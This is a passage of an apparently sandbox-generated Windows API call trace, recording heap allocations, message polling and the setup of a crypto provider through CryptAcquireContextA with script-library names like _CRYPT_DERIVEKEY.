hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0140.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0140.667] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0140.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0140.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0140.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0140.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0140.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0140.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0140.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a48 [0140.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0140.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0140.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0140.668] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0140.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0140.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0140.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0140.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0140.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0140.668] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0140.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0140.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0140.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0140.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0140.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0140.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0140.672] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0140.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0140.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0140.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0140.673] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0140.673] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0140.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0140.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0140.673] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0140.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0140.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0140.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0140.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0140.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0140.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0140.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0140.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0140.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0140.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0140.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0140.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0140.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.808] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0140.808] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0140.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0140.808] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0140.808] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.808] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0140.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0140.808] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.808] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0140.808] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0140.808] PeekMessageW (in: 